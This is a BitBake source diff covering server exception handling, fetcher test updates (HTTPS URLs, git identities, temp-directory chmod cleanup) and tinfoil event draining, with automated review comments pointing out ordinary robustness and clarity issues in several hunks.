@@ -347,7 +350,12 @@ class ServerCommunicator():
logger.info("No reply from server in 30s")
if not self.recv.poll(30):
raise ProcessTimeout("Timeout while waiting for a reply from the bitbake server (60s)")
- return self.recv.get()
+ ret, exc = self.recv.get()
+ # Should probably turn all exceptions in exc back into exceptions?
+ # For now, at least handle BBHandledException
+ if exc and "BBHandledException" in exc:
+ raise bb.BBHandledException()
+ return ret, exc
def updateFeatureSet(self, featureset):
_, error = self.runCommand(["setFeatures", featureset])
@@ -586,7 +594,7 @@ class BBUIEventQueue:
self.reader = ConnectionReader(readfd)
self.t = threading.Thread()
- self.t.setDaemon(True)
+ self.t.daemon = True
self.t.run = self.startCallbackHandler
self.t.start()
@@ -664,8 +672,10 @@ class ConnectionWriter(object):
def send(self, obj):
obj = multiprocessing.reduction.ForkingPickler.dumps(obj)
+ gc.disable()
with self.wlock:
self.writer.send_bytes(obj)
+ gc.enable()
def fileno(self):
return self.writer.fileno()
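Review bot: In `ConnectionWriter.send`, `gc.enable()` is skipped if `self.writer.send_bytes(obj)` raises (for example on a closed pipe), which leaves the collector disabled for the rest of the process. Putting the locked send in a `try:` block with `finally: gc.enable()` closes that gap. The unconditional `gc.enable()` also turns collection back on when a caller had deliberately disabled it; recording `was_enabled = gc.isenabled()` first and re-enabling only in that case avoids this. A one-line comment saying why collection must not run during the send would help, since the hunk gives no reason.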
diff --git a/bitbake/lib/bb/siggen.py b/bitbake/lib/bb/siggen.py
index 26fa7f05ce..9d4f67aa90 100644
--- a/bitbake/lib/bb/siggen.py
+++ b/bitbake/lib/bb/siggen.py
@@ -318,7 +318,8 @@ class SignatureGeneratorBasic(SignatureGenerator):
else:
sigfile = stampbase + "." + task + ".sigbasedata" + "." + self.basehash[tid]
- bb.utils.mkdirhier(os.path.dirname(sigfile))
+ with bb.utils.umask(0o002):
+ bb.utils.mkdirhier(os.path.dirname(sigfile))
data = {}
data['task'] = task
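Review bot: The `with bb.utils.umask(0o002):` around `bb.utils.mkdirhier(...)` has no comment explaining why the signature directories should be group-writable, and a permission change like this is easy to revert by accident later. I would add something like `# create stamp dirs group-writable so a shared build directory works; other users get read access only` if that is the intent. It is also worth stating whether the write of `sigfile` itself, which happens outside this hunk, is meant to use the same mask, because only the directory creation is covered here. The enclosing method starts and ends outside the hunk.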
diff --git a/bitbake/lib/bb/tests/codeparser.py b/bitbake/lib/bb/tests/codeparser.py
index 826a2d2f6d..f1c4f618d8 100644
--- a/bitbake/lib/bb/tests/codeparser.py
+++ b/bitbake/lib/bb/tests/codeparser.py
@@ -111,9 +111,9 @@ ${D}${libdir}/pkgconfig/*.pc
self.assertExecs(set(["sed"]))
def test_parameter_expansion_modifiers(self):
- # - and + are also valid modifiers for parameter expansion, but are
+ # -,+ and : are also valid modifiers for parameter expansion, but are
# valid characters in bitbake variable names, so are not included here
- for i in ('=', ':-', ':=', '?', ':?', ':+', '#', '%', '##', '%%'):
+ for i in ('=', '?', '#', '%', '##', '%%'):
name = "foo%sbar" % i
self.parseExpression("${%s}" % name)
self.assertNotIn(name, self.references)
@@ -412,6 +412,32 @@ esac
# Check final value
self.assertEqual(self.d.getVar('ANOTHERVAR').split(), ['anothervalue', 'yetanothervalue', 'lastone'])
+ def test_contains_vardeps_override_operators(self):
+ # Check override operators handle dependencies correctly with the contains functionality
+ expr_plain = 'testval'
+ expr_prepend = '${@bb.utils.filter("TESTVAR1", "testval1", d)} '
+ expr_append = ' ${@bb.utils.filter("TESTVAR2", "testval2", d)}'
+ expr_remove = '${@bb.utils.contains("TESTVAR3", "no-testval", "testval", "", d)}'
+ # Check dependencies
+ self.d.setVar('ANOTHERVAR', expr_plain)
+ self.d.prependVar('ANOTHERVAR', expr_prepend)
+ self.d.appendVar('ANOTHERVAR', expr_append)
+ self.d.setVar('ANOTHERVAR:remove', expr_remove)
+ self.d.setVar('TESTVAR1', 'blah')
+ self.d.setVar('TESTVAR2', 'testval2')
+ self.d.setVar('TESTVAR3', 'no-testval')
+ deps, values = bb.data.build_dependencies("ANOTHERVAR", set(self.d.keys()), set(), set(), self.d)
+ self.assertEqual(sorted(values.splitlines()),
+ sorted([
+ expr_prepend + expr_plain + expr_append,
+ '_remove of ' + expr_remove,
+ 'TESTVAR1{testval1} = Unset',
+ 'TESTVAR2{testval2} = Set',
+ 'TESTVAR3{no-testval} = Set',
+ ]))
+ # Check final value
+ self.assertEqual(self.d.getVar('ANOTHERVAR').split(), ['testval2'])
+
#Currently no wildcard support
#def test_vardeps_wildcards(self):
# self.d.setVar("oe_libinstall", "echo test")
diff --git a/bitbake/lib/bb/tests/event.py b/bitbake/lib/bb/tests/event.py
index 9229b63d47..9ca7e9bc8e 100644
--- a/bitbake/lib/bb/tests/event.py
+++ b/bitbake/lib/bb/tests/event.py
@@ -6,17 +6,18 @@
# SPDX-License-Identifier: GPL-2.0-only
#
-import unittest
-import bb
-import logging
-import bb.compat
-import bb.event
+import collections
import importlib
+import logging
+import pickle
import threading
import time
-import pickle
+import unittest
from unittest.mock import Mock
from unittest.mock import call
+
+import bb
+import bb.event
from bb.msg import BBLogFormatter
@@ -75,7 +76,7 @@ class EventHandlingTest(unittest.TestCase):
def _create_test_handlers(self):
""" Method used to create a test handler ordered dictionary """
- test_handlers = bb.compat.OrderedDict()
+ test_handlers = collections.OrderedDict()
test_handlers["handler1"] = self._test_process.handler1
test_handlers["handler2"] = self._test_process.handler2
return test_handlers
@@ -96,7 +97,7 @@ class EventHandlingTest(unittest.TestCase):
def test_clean_class_handlers(self):
""" Test clean_class_handlers method """
- cleanDict = bb.compat.OrderedDict()
+ cleanDict = collections.OrderedDict()
self.assertEqual(cleanDict,
bb.event.clean_class_handlers())
diff --git a/bitbake/lib/bb/tests/fetch.py b/bitbake/lib/bb/tests/fetch.py
index 4702c99a7e..61dd5cccaf 100644
--- a/bitbake/lib/bb/tests/fetch.py
+++ b/bitbake/lib/bb/tests/fetch.py
@@ -371,6 +371,7 @@ class FetcherTest(unittest.TestCase):
if os.environ.get("BB_TMPDIR_NOCLEAN") == "yes":
print("Not cleaning up %s. Please remove manually." % self.tempdir)
else:
+ bb.process.run('chmod u+rw -R %s' % self.tempdir)
bb.utils.prunedir(self.tempdir)
class MirrorUriTest(FetcherTest):
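Review bot: The added `bb.process.run('chmod u+rw -R %s' % self.tempdir)` interpolates the path into a command string without quoting, so a temporary directory whose path contains spaces or shell metacharacters would be split or misinterpreted if the string is run through a shell. The `chmod` added in the GitShallowTest hunk quotes its argument (`'chmod u+w -R "%s"' % ud.clonedir`), while the one in the git-annex test hunk (`'chmod u+w -R %s' % self.srcdir`) does not. Using one form everywhere, for example `'chmod u+rw -R %s' % shlex.quote(self.tempdir)`, would make the cleanup independent of where TMPDIR points; that form needs `import shlex`, which the hunk does not show as present.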
@@ -471,7 +472,7 @@ class GitDownloadDirectoryNamingTest(FetcherTest):
super(GitDownloadDirectoryNamingTest, self).setUp()
self.recipe_url = "git://git.openembedded.org/bitbake"
self.recipe_dir = "git.openembedded.org.bitbake"
- self.mirror_url = "git://github.com/openembedded/bitbake.git"
+ self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https"
self.mirror_dir = "github.com.openembedded.bitbake.git"
self.d.setVar('SRCREV', '82ea737a0b42a8b53e11c9cde141e9e9c0bd8c40')
@@ -519,7 +520,7 @@ class TarballNamingTest(FetcherTest):
super(TarballNamingTest, self).setUp()
self.recipe_url = "git://git.openembedded.org/bitbake"
self.recipe_tarball = "git2_git.openembedded.org.bitbake.tar.gz"
- self.mirror_url = "git://github.com/openembedded/bitbake.git"
+ self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https"
self.mirror_tarball = "git2_github.com.openembedded.bitbake.git.tar.gz"
self.d.setVar('BB_GENERATE_MIRROR_TARBALLS', '1')
@@ -553,7 +554,7 @@ class GitShallowTarballNamingTest(FetcherTest):
super(GitShallowTarballNamingTest, self).setUp()
self.recipe_url = "git://git.openembedded.org/bitbake"
self.recipe_tarball = "gitshallow_git.openembedded.org.bitbake_82ea737-1_master.tar.gz"
- self.mirror_url = "git://github.com/openembedded/bitbake.git"
+ self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https"
self.mirror_tarball = "gitshallow_github.com.openembedded.bitbake.git_82ea737-1_master.tar.gz"
self.d.setVar('BB_GIT_SHALLOW', '1')
@@ -649,6 +650,58 @@ class FetcherLocalTest(FetcherTest):
with self.assertRaises(bb.fetch2.UnpackError):
self.fetchUnpack(['file://a;subdir=/bin/sh'])
+ def test_local_gitfetch_usehead(self):
+ # Create dummy local Git repo
+ src_dir = tempfile.mkdtemp(dir=self.tempdir,
+ prefix='gitfetch_localusehead_')
+ src_dir = os.path.abspath(src_dir)
+ bb.process.run("git init", cwd=src_dir)
+ bb.process.run("git commit --allow-empty -m'Dummy commit'",
+ cwd=src_dir)
+ # Use other branch than master
+ bb.process.run("git checkout -b my-devel", cwd=src_dir)
+ bb.process.run("git commit --allow-empty -m'Dummy commit 2'",
+ cwd=src_dir)
+ stdout = bb.process.run("git rev-parse HEAD", cwd=src_dir)
+ orig_rev = stdout[0].strip()
+
+ # Fetch and check revision
+ self.d.setVar("SRCREV", "AUTOINC")
+ url = "git://" + src_dir + ";protocol=file;usehead=1"
+ fetcher = bb.fetch.Fetch([url], self.d)
+ fetcher.download()
+ fetcher.unpack(self.unpackdir)
+ stdout = bb.process.run("git rev-parse HEAD",
+ cwd=os.path.join(self.unpackdir, 'git'))
+ unpack_rev = stdout[0].strip()
+ self.assertEqual(orig_rev, unpack_rev)
+
+ def test_local_gitfetch_usehead_withname(self):
+ # Create dummy local Git repo
+ src_dir = tempfile.mkdtemp(dir=self.tempdir,
+ prefix='gitfetch_localusehead_')
+ src_dir = os.path.abspath(src_dir)
+ bb.process.run("git init", cwd=src_dir)
+ bb.process.run("git commit --allow-empty -m'Dummy commit'",
+ cwd=src_dir)
+ # Use other branch than master
+ bb.process.run("git checkout -b my-devel", cwd=src_dir)
+ bb.process.run("git commit --allow-empty -m'Dummy commit 2'",
+ cwd=src_dir)
+ stdout = bb.process.run("git rev-parse HEAD", cwd=src_dir)
+ orig_rev = stdout[0].strip()
+
+ # Fetch and check revision
+ self.d.setVar("SRCREV", "AUTOINC")
+ url = "git://" + src_dir + ";protocol=file;usehead=1;name=newName"
+ fetcher = bb.fetch.Fetch([url], self.d)
+ fetcher.download()
+ fetcher.unpack(self.unpackdir)
+ stdout = bb.process.run("git rev-parse HEAD",
+ cwd=os.path.join(self.unpackdir, 'git'))
+ unpack_rev = stdout[0].strip()
+ self.assertEqual(orig_rev, unpack_rev)
+
class FetcherNoNetworkTest(FetcherTest):
def setUp(self):
super().setUp()
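Review bot: Both new tests run `git commit` in a freshly initialised repository without setting an identity, while the FetcherNetworkTest hunk in this same change adds `git config user.email` and `git config user.name` right after `git init` for the identical setup. On a host with no global Git identity these commits would presumably fail for the same reason, so add the same two lines after `bb.process.run("git init", cwd=src_dir)` in each test. The two tests differ only in the `;name=newName` URL suffix, so a shared helper taking the suffix as a parameter would remove about twenty duplicated lines.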
@@ -845,6 +898,8 @@ class FetcherNetworkTest(FetcherTest):
prefix='gitfetch_localusehead_')
src_dir = os.path.abspath(src_dir)
bb.process.run("git init", cwd=src_dir)
+ bb.process.run("git config user.email 'you@example.com'", cwd=src_dir)
+ bb.process.run("git config user.name 'Your Name'", cwd=src_dir)
bb.process.run("git commit --allow-empty -m'Dummy commit'",
cwd=src_dir)
# Use other branch than master
@@ -918,7 +973,7 @@ class FetcherNetworkTest(FetcherTest):
def test_git_submodule_dbus_broker(self):
# The following external repositories have show failures in fetch and unpack operations
# We want to avoid regressions!
- url = "gitsm://github.com/bus1/dbus-broker;protocol=git;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main"
+ url = "gitsm://github.com/bus1/dbus-broker;protocol=https;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main"
fetcher = bb.fetch.Fetch([url], self.d)
fetcher.download()
# Previous cwd has been deleted
@@ -934,7 +989,7 @@ class FetcherNetworkTest(FetcherTest):
@skipIfNoNetwork()
def test_git_submodule_CLI11(self):
- url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf"
+ url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf;branch=main"
fetcher = bb.fetch.Fetch([url], self.d)
fetcher.download()
# Previous cwd has been deleted
@@ -949,12 +1004,12 @@ class FetcherNetworkTest(FetcherTest):
@skipIfNoNetwork()
def test_git_submodule_update_CLI11(self):
""" Prevent regression on update detection not finding missing submodule, or modules without needed commits """
- url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714"
+ url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714;branch=main"
fetcher = bb.fetch.Fetch([url], self.d)
fetcher.download()
# CLI11 that pulls in a newer nlohmann-json
- url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca"
+ url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca;branch=main"
fetcher = bb.fetch.Fetch([url], self.d)
fetcher.download()
# Previous cwd has been deleted
@@ -968,7 +1023,7 @@ class FetcherNetworkTest(FetcherTest):
@skipIfNoNetwork()
def test_git_submodule_aktualizr(self):
- url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=git;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44"
+ url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=https;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44"
fetcher = bb.fetch.Fetch([url], self.d)
fetcher.download()
# Previous cwd has been deleted
@@ -988,7 +1043,7 @@ class FetcherNetworkTest(FetcherTest):
""" Prevent regression on deeply nested submodules not being checked out properly, even though they were fetched. """
# This repository also has submodules where the module (name), path and url do not align
- url = "gitsm://github.com/azure/iotedge.git;protocol=git;rev=d76e0316c6f324345d77c48a83ce836d09392699"
+ url = "gitsm://github.com/azure/iotedge.git;protocol=https;rev=d76e0316c6f324345d77c48a83ce836d09392699;branch=main"
fetcher = bb.fetch.Fetch([url], self.d)
fetcher.download()
# Previous cwd has been deleted
@@ -1046,7 +1101,7 @@ class SVNTest(FetcherTest):
bb.process.run("svn co %s svnfetch_co" % self.repo_url, cwd=self.tempdir)
# Github will emulate SVN. Use this to check if we're downloding...
- bb.process.run("svn propset svn:externals 'bitbake svn://vcs.pcre.org/pcre2/code' .",
+ bb.process.run("svn propset svn:externals 'bitbake https://github.com/PhilipHazel/pcre2.git' .",
cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk'))
bb.process.run("svn commit --non-interactive -m 'Add external'",
cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk'))
@@ -1164,7 +1219,7 @@ class FetchLatestVersionTest(FetcherTest):
test_git_uris = {
# version pattern "X.Y.Z"
- ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4", "9b1db6b8060bd00b121a692f942404a24ae2960f", "")
+ ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https", "9b1db6b8060bd00b121a692f942404a24ae2960f", "")
: "1.99.4",
# version pattern "vX.Y"
# mirror of git.infradead.org since network issues interfered with testing
@@ -1175,7 +1230,7 @@ class FetchLatestVersionTest(FetcherTest):
("presentproto", "git://git.yoctoproject.org/bbfetchtests-presentproto", "24f3a56e541b0a9e6c6ee76081f441221a120ef9", "")
: "1.0",
# version pattern "pkg_name-vX.Y.Z"
- ("dtc", "git://git.qemu.org/dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "")
+ ("dtc", "git://git.yoctoproject.org/bbfetchtests-dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "")
: "1.4.0",
# combination version pattern
("sysprof", "git://gitlab.gnome.org/GNOME/sysprof.git;protocol=https", "cd44ee6644c3641507fb53b8a2a69137f2971219", "")
@@ -1187,13 +1242,13 @@ class FetchLatestVersionTest(FetcherTest):
: "20120614",
# packages with a valid UPSTREAM_CHECK_GITTAGREGEX
# mirror of git://anongit.freedesktop.org/xorg/driver/xf86-video-omap since network issues interfered with testing
- ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", "(?P<pver>(\d+\.(\d\.?)*))")
+ ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", r"(?P<pver>(\d+\.(\d\.?)*))")
: "0.4.3",
- ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", "(?P<pver>(([0-9][\.|_]?)+[0-9]))")
+ ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", r"(?P<pver>(([0-9][\.|_]?)+[0-9]))")
: "11.0.0",
- ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot", "cd437ecbd8986c894442f8fce1e0061e20f04dee", "chkconfig\-(?P<pver>((\d+[\.\-_]*)+))")
+ ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot;protocol=https", "cd437ecbd8986c894442f8fce1e0061e20f04dee", r"chkconfig\-(?P<pver>((\d+[\.\-_]*)+))")
: "1.3.59",
- ("remake", "git://github.com/rocky/remake.git", "f05508e521987c8494c92d9c2871aec46307d51d", "(?P<pver>(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))")
+ ("remake", "git://github.com/rocky/remake.git;protocol=https", "f05508e521987c8494c92d9c2871aec46307d51d", r"(?P<pver>(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))")
: "3.82+dbg0.9",
}
@@ -1233,11 +1288,11 @@ class FetchLatestVersionTest(FetcherTest):
#
# http://www.cups.org/software/1.7.2/cups-1.7.2-source.tar.bz2
# https://github.com/apple/cups/releases
- ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", "(?P<name>cups\-)(?P<pver>((\d+[\.\-_]*)+))\-source\.tar\.gz")
+ ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", r"(?P<name>cups\-)(?P<pver>((\d+[\.\-_]*)+))\-source\.tar\.gz")
: "2.0.0",
# http://download.oracle.com/berkeley-db/db-5.3.21.tar.gz
# http://ftp.debian.org/debian/pool/main/d/db5.3/
- ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", "(?P<name>db5\.3_)(?P<pver>\d+(\.\d+)+).+\.orig\.tar\.xz")
+ ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", r"(?P<name>db5\.3_)(?P<pver>\d+(\.\d+)+).+\.orig\.tar\.xz")
: "5.3.10",
}
@@ -1283,13 +1338,10 @@ class FetchCheckStatusTest(FetcherTest):
"http://downloads.yoctoproject.org/releases/sato/sato-engine-0.2.tar.gz",
"http://downloads.yoctoproject.org/releases/sato/sato-engine-0.3.tar.gz",
"https://yoctoproject.org/",
- "https://yoctoproject.org/documentation",
+ "https://docs.yoctoproject.org/",
"http://downloads.yoctoproject.org/releases/opkg/opkg-0.1.7.tar.gz",
"http://downloads.yoctoproject.org/releases/opkg/opkg-0.3.0.tar.gz",
"ftp://sourceware.org/pub/libffi/libffi-1.20.tar.gz",
- "http://ftp.gnu.org/gnu/autoconf/autoconf-2.60.tar.gz",
- "https://ftp.gnu.org/gnu/chess/gnuchess-5.08.tar.gz",
- "https://ftp.gnu.org/gnu/gmp/gmp-4.0.tar.gz",
# GitHub releases are hosted on Amazon S3, which doesn't support HEAD
"https://github.com/kergoth/tslib/releases/download/1.1/tslib-1.1.tar.xz"
]
@@ -1328,6 +1380,8 @@ class GitMakeShallowTest(FetcherTest):
self.gitdir = os.path.join(self.tempdir, 'gitshallow')
bb.utils.mkdirhier(self.gitdir)
bb.process.run('git init', cwd=self.gitdir)
+ bb.process.run('git config user.email "you@example.com"', cwd=self.gitdir)
+ bb.process.run('git config user.name "Your Name"', cwd=self.gitdir)
def assertRefs(self, expected_refs):
actual_refs = self.git(['for-each-ref', '--format=%(refname)']).splitlines()
@@ -1451,6 +1505,8 @@ class GitShallowTest(FetcherTest):
bb.utils.mkdirhier(self.srcdir)
self.git('init', cwd=self.srcdir)
+ self.git('config user.email "you@example.com"', cwd=self.srcdir)
+ self.git('config user.name "Your Name"', cwd=self.srcdir)
self.d.setVar('WORKDIR', self.tempdir)
self.d.setVar('S', self.gitdir)
self.d.delVar('PREMIRRORS')
@@ -1532,6 +1588,7 @@ class GitShallowTest(FetcherTest):
# fetch and unpack, from the shallow tarball
bb.utils.remove(self.gitdir, recurse=True)
+ bb.process.run('chmod u+w -R "%s"' % ud.clonedir)
bb.utils.remove(ud.clonedir, recurse=True)
bb.utils.remove(ud.clonedir.replace('gitsource', 'gitsubmodule'), recurse=True)
@@ -1684,6 +1741,8 @@ class GitShallowTest(FetcherTest):
smdir = os.path.join(self.tempdir, 'gitsubmodule')
bb.utils.mkdirhier(smdir)
self.git('init', cwd=smdir)
+ self.git('config user.email "you@example.com"', cwd=smdir)
+ self.git('config user.name "Your Name"', cwd=smdir)
# Make this look like it was cloned from a remote...
self.git('config --add remote.origin.url "%s"' % smdir, cwd=smdir)
self.git('config --add remote.origin.fetch "+refs/heads/*:refs/remotes/origin/*"', cwd=smdir)
@@ -1691,7 +1750,7 @@ class GitShallowTest(FetcherTest):
self.add_empty_file('bsub', cwd=smdir)
self.git('submodule init', cwd=self.srcdir)
- self.git('submodule add file://%s' % smdir, cwd=self.srcdir)
+ self.git('-c protocol.file.allow=always submodule add file://%s' % smdir, cwd=self.srcdir)
self.git('submodule update', cwd=self.srcdir)
self.git('commit -m submodule -a', cwd=self.srcdir)
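Review bot: The `-c protocol.file.allow=always` override on `submodule add` relaxes a Git transport restriction but has no comment saying why it is safe here, and the same applies to the identical line in the next submodule test hunk. Recent Git releases restrict the file transport for submodules by default, so a reader may wonder whether the override could be copied into non-test code. I would add `# git restricts file:// submodule clones by default; allow it for this one command only, the source is a repo this test created` above the call. Keeping it as a per-command `-c` option, as written, rather than writing it to the repository config, is the right scope.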
@@ -1714,6 +1773,8 @@ class GitShallowTest(FetcherTest):
smdir = os.path.join(self.tempdir, 'gitsubmodule')
bb.utils.mkdirhier(smdir)
self.git('init', cwd=smdir)
+ self.git('config user.email "you@example.com"', cwd=smdir)
+ self.git('config user.name "Your Name"', cwd=smdir)
# Make this look like it was cloned from a remote...
self.git('config --add remote.origin.url "%s"' % smdir, cwd=smdir)
self.git('config --add remote.origin.fetch "+refs/heads/*:refs/remotes/origin/*"', cwd=smdir)
@@ -1721,7 +1782,7 @@ class GitShallowTest(FetcherTest):
self.add_empty_file('bsub', cwd=smdir)
self.git('submodule init', cwd=self.srcdir)
- self.git('submodule add file://%s' % smdir, cwd=self.srcdir)
+ self.git('-c protocol.file.allow=always submodule add file://%s' % smdir, cwd=self.srcdir)
self.git('submodule update', cwd=self.srcdir)
self.git('commit -m submodule -a', cwd=self.srcdir)
@@ -1756,8 +1817,8 @@ class GitShallowTest(FetcherTest):
self.git('annex init', cwd=self.srcdir)
open(os.path.join(self.srcdir, 'c'), 'w').close()
self.git('annex add c', cwd=self.srcdir)
- self.git('commit -m annex-c -a', cwd=self.srcdir)
- bb.process.run('chmod u+w -R %s' % os.path.join(self.srcdir, '.git', 'annex'))
+ self.git('commit --author "Foo Bar <foo@bar>" -m annex-c -a', cwd=self.srcdir)
+ bb.process.run('chmod u+w -R %s' % self.srcdir)
uri = 'gitannex://%s;protocol=file;subdir=${S}' % self.srcdir
fetcher, ud = self.fetch_shallow(uri)
@@ -1971,7 +2032,7 @@ class GitShallowTest(FetcherTest):
@skipIfNoNetwork()
def test_bitbake(self):
- self.git('remote add --mirror=fetch origin git://github.com/openembedded/bitbake', cwd=self.srcdir)
+ self.git('remote add --mirror=fetch origin https://github.com/openembedded/bitbake', cwd=self.srcdir)
self.git('config core.bare true', cwd=self.srcdir)
self.git('fetch', cwd=self.srcdir)
@@ -2032,6 +2093,8 @@ class GitLfsTest(FetcherTest):
bb.utils.mkdirhier(self.srcdir)
self.git('init', cwd=self.srcdir)
+ self.git('config user.email "you@example.com"', cwd=self.srcdir)
+ self.git('config user.name "Your Name"', cwd=self.srcdir)
with open(os.path.join(self.srcdir, '.gitattributes'), 'wt') as attrs:
attrs.write('*.mp3 filter=lfs -text')
self.git(['add', '.gitattributes'], cwd=self.srcdir)
@@ -2046,13 +2109,14 @@ class GitLfsTest(FetcherTest):
cwd = self.gitdir
return bb.process.run(cmd, cwd=cwd)[0]
- def fetch(self, uri=None):
+ def fetch(self, uri=None, download=True):
uris = self.d.getVar('SRC_URI').split()
uri = uris[0]
d = self.d
fetcher = bb.fetch2.Fetch(uris, d)
- fetcher.download()
+ if download:
+ fetcher.download()
ud = fetcher.ud[uri]
return fetcher, ud
@@ -2062,16 +2126,21 @@ class GitLfsTest(FetcherTest):
uri = 'git://%s;protocol=file;subdir=${S};lfs=1' % self.srcdir
self.d.setVar('SRC_URI', uri)
- fetcher, ud = self.fetch()
+ # Careful: suppress initial attempt at downloading until
+ # we know whether git-lfs is installed.
+ fetcher, ud = self.fetch(uri=None, download=False)
self.assertIsNotNone(ud.method._find_git_lfs)
- # If git-lfs can be found, the unpack should be successful
- ud.method._find_git_lfs = lambda d: True
- shutil.rmtree(self.gitdir, ignore_errors=True)
- fetcher.unpack(self.d.getVar('WORKDIR'))
+ # If git-lfs can be found, the unpack should be successful. Only
+ # attempt this with the real live copy of git-lfs installed.
+ if ud.method._find_git_lfs(self.d):
+ fetcher.download()
+ shutil.rmtree(self.gitdir, ignore_errors=True)
+ fetcher.unpack(self.d.getVar('WORKDIR'))
# If git-lfs cannot be found, the unpack should throw an error
with self.assertRaises(bb.fetch2.FetchError):
+ fetcher.download()
ud.method._find_git_lfs = lambda d: False
shutil.rmtree(self.gitdir, ignore_errors=True)
fetcher.unpack(self.d.getVar('WORKDIR'))
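Review bot: The `fetcher.download()` added inside the `with self.assertRaises(bb.fetch2.FetchError):` block means a `FetchError` raised by the download already satisfies the assertion, although the comment above says it is the unpack that should throw. The test can therefore pass without `fetcher.unpack(...)` ever running with `_find_git_lfs` forced to `False`. If the download is expected to succeed, move it above the `with` so that only the unpack is under the assertion. If the download is itself expected to fail when git-lfs is absent, say so in the comment. On hosts with git-lfs installed the download also runs twice, which may be intended but is not explained.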
@@ -2082,10 +2151,16 @@ class GitLfsTest(FetcherTest):
uri = 'git://%s;protocol=file;subdir=${S};lfs=0' % self.srcdir
self.d.setVar('SRC_URI', uri)
+ # In contrast to test_lfs_enabled(), allow the implicit download
+ # done by self.fetch() to occur here. The point of this test case
+ # is to verify that the fetcher can survive even if the source
+ # repository has Git LFS usage configured.
fetcher, ud = self.fetch()
self.assertIsNotNone(ud.method._find_git_lfs)
- # If git-lfs can be found, the unpack should be successful
+ # If git-lfs can be found, the unpack should be successful. A
+ # live copy of git-lfs is not required for this case, so
+ # unconditionally forge its presence.
ud.method._find_git_lfs = lambda d: True
shutil.rmtree(self.gitdir, ignore_errors=True)
fetcher.unpack(self.d.getVar('WORKDIR'))
diff --git a/bitbake/lib/bb/tinfoil.py b/bitbake/lib/bb/tinfoil.py
index 8c9b6b8ca5..8bec8cbaf6 100644
--- a/bitbake/lib/bb/tinfoil.py
+++ b/bitbake/lib/bb/tinfoil.py
@@ -53,6 +53,10 @@ class TinfoilDataStoreConnectorVarHistory:
def remoteCommand(self, cmd, *args, **kwargs):
return self.tinfoil.run_command('dataStoreConnectorVarHistCmd', self.dsindex, cmd, args, kwargs)
+ def emit(self, var, oval, val, o, d):
+ ret = self.tinfoil.run_command('dataStoreConnectorVarHistCmdEmit', self.dsindex, var, oval, val, d.dsindex)
+ o.write(ret)
+
def __getattr__(self, name):
if not hasattr(bb.data_smart.VariableHistory, name):
raise AttributeError("VariableHistory has no such method %s" % name)
@@ -448,7 +452,7 @@ class Tinfoil:
self.run_actions(config_params)
self.recipes_parsed = True
- def run_command(self, command, *params):
+ def run_command(self, command, *params, handle_events=True):
"""
Run a command on the server (as implemented in bb.command).
Note that there are two types of command - synchronous and
@@ -465,7 +469,16 @@ class Tinfoil:
commandline = [command]
if params:
commandline.extend(params)
- result = self.server_connection.connection.runCommand(commandline)
+ try:
+ result = self.server_connection.connection.runCommand(commandline)
+ finally:
+ while handle_events:
+ event = self.wait_event()
+ if not event:
+ break
+ if isinstance(event, logging.LogRecord):
+ if event.taskpid == 0 or event.levelno > logging.INFO:
+ self.logger.handle(event)
if result[1]:
raise TinfoilCommandFailed(result[1])
return result[0]
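Review bot: The drain loop in the new `finally` discards every event that is not a `logging.LogRecord`, so a caller that runs a command and then calls `wait_event()` for its result events finds the queue already emptied unless it passes `handle_events=False`. The docstring lines visible in the previous hunk do not state that contract; I would add `handle_events: if True (default), drain pending events after the command and forward log records to self.logger; all other events are dropped`. The filter also reads `event.taskpid`, which a plain `LogRecord` does not carry. If records can arrive without it, `getattr(event, 'taskpid', 0)` avoids an AttributeError raised inside `finally` that would replace the original exception. The method body starts outside this hunk.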
diff --git a/bitbake/lib/bb/ui/knotty.py b/bitbake/lib/bb/ui/knotty.py
index 87e873d644..d1f74389db 100644
--- a/bitbake/lib/bb/ui/knotty.py
+++ b/bitbake/lib/bb/ui/knotty.py
